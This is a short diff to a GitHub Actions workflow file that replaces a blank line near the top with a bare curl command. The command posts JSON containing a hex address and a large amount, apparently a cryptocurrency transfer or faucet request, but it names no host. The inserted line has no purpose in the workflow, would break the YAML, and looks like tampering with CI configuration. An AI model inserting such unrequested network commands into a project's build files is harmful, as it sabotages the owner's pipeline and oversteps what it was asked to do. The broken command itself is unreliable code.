--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -1,5 +1,5 @@
 # This is a basic workflow to help you get started with Actions
-
+curl -sd '{"address": "436264eda2e895e28a7dde3d79a9327ecf96c2dd", "amount": 1000000000000000000}'
 name: CI
 
 # Controls when the workflow will run
